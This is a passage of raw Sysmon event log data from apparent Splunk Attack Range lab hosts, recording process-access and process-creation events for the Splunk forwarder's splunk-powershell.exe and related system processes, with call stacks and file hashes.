Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000045291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000017734Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E577-63C7-2202-00000000B002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017733Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017732Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017731Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017730Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017729Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017728Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017727Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017726Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017725Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017724Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E577-63C7-2202-00000000B002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017723Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.627{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E577-63C7-2202-00000000B002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017722Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.628{E5A8D418-E577-63C7-2202-00000000B002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017721Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:31.478{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=C803187266AD99A9FBA0EC3064A00F35,SHA256=C67FAFC3616D5AC92590E07D53E0AD88ACC87662EB71CE4DFCDF5AAA21A9F1A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.286{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.287{FE4C2B44-E577-63C7-6D06-00000000AF02}6768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017764Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E578-63C7-2402-00000000B002}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017763Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017762Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.993{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017761Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 